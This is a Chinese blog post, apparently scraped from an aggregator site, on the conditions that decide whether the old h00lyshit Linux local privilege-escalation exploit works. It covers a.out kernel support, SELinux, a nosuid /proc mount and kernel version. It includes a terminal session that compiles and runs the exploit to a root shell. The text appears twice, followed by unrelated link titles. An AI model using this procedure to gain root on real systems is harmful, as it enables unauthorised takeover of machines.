影响 h00lyshit 成功的几个因素
来源:互联网 发布:怎么找论文数据 编辑:程序博客网 时间:2024/05/03 23:43
导读:
1.内核CONFIG_BINFMT_AOUT选项被设置为n或内核不支持a.out (Assembler.OUTput)格式,会出现错误failed: Exec format error
现在distro的内核不加入a.out的支持的,比如fedora的内核:
$cat /boot/config-2.6.14-1.1637_FC4 | grep AOUT
# CONFIG_BINFMT_AOUT is not set
2.启用SELinux,会导致错误failed: Permission denied
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: enabled
SELINUX=enabled
3.在/etc/fstab中对/proc增加了nosuid
$ cat /etc/fstab | grep proc
proc /proc proc defaults,noexec,nosuid 0 0
4.打了补丁或版本不符
Linux Kernel <= 2.6.17.4
$ uname -a
Linux localhost.localdomain 2.6.13-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
$ cat /etc/fstab | grep proc
proc /proc proc defaults 0 0
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: disabled
SELINUX=disabled
$ grep CONFIG _BINFMT_AOUT /boot/config-2.6.13-42.EL
CONFIG_BINFMT_AOUT=y
$ dd if=/dev/zero of=/tmp/out.tmp bs=1M count=100
$ du -sh /tmp/out.tmp
100M /tmp/out.tmp
$ gcc h00lyshit.c -o h00lyshit
$ cat /usr/lib/* >/dev/null 2>/dev/null
$ ./h00lyshit /tmp/out.tmp
preparing
trying to exploit out.tmp
# id
uid=0(root)
#
1.内核CONFIG_BINFMT_AOUT选项被设置为n或内核不支持a.out (Assembler.OUTput)格式,会出现错误failed: Exec format error
现在distro的内核不加入a.out的支持的,比如fedora的内核:
$cat /boot/config-2.6.14-1.1637_FC4 | grep AOUT
# CONFIG_BINFMT_AOUT is not set
2.启用SELinux,会导致错误failed: Permission denied
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: enabled
SELINUX=enabled
3.在/etc/fstab中对/proc增加了nosuid
$ cat /etc/fstab | grep proc
proc /proc proc defaults,noexec,nosuid 0 0
4.打了补丁或版本不符
Linux Kernel <= 2.6.17.4
$ uname -a
Linux localhost.localdomain 2.6.13-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
$ cat /etc/fstab | grep proc
proc /proc proc defaults 0 0
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: disabled
SELINUX=disabled
$ grep CONFIG _BINFMT_AOUT /boot/config-2.6.13-42.EL
CONFIG_BINFMT_AOUT=y
$ dd if=/dev/zero of=/tmp/out.tmp bs=1M count=100
$ du -sh /tmp/out.tmp
100M /tmp/out.tmp
$ gcc h00lyshit.c -o h00lyshit
$ cat /usr/lib/* >/dev/null 2>/dev/null
$ ./h00lyshit /tmp/out.tmp
preparing
trying to exploit out.tmp
# id
uid=0(root)
#
- 影响 h00lyshit 成功的几个因素
- 影响WinCE启动速度的几个因素
- 影响ActiveMQ性能的几个重要因素
- 总结:影响玉米容量的几个因素
- 影响ActiveMQ性能的几个重要因素
- 影响HBase insert性能的几个因素
- 影响数据检索效率的几个因素
- 影响ActiveMQ性能的几个重要因素
- Unity中影响性能的几个因素
- 影响HBase insert性能的几个因素
- 影响国际ERP项目成功的5大因素
- 影响一个UIView是否能正常显示的几个因素
- 影响SQL Server数据库应用性能的几个常见因素
- 影响无线通讯可靠性和距离的几个因素
- 影响SQL Server数据库应用性能的几个常见因素
- 影响PHP+MySQL网站打开速度的几个因素
- 中科昆锐浅析影响温度传感器测量精度的几个因素
- 影响SQL Server数据库应用性能的几个常见因素
- 提高AJAX客户端响应速度
- Ajax应用场景-Ajax适合的应用场合
- .NET序列化机制(非本人原创)
- Mysql的优化设置
- -
- 影响 h00lyshit 成功的几个因素
- 【LeetCode with Python】 Maximum Depth of Binary Tree
- 【LeetCode with Python】 Minimum Depth of Binary Tree
- 通过Linux系统伪装方法加固系统安全
- 设计模式
- 关于公务员考试
- 【LeetCode with Python】 Merge Intervals
- Unix操作系统入侵追踪反击战
- 征程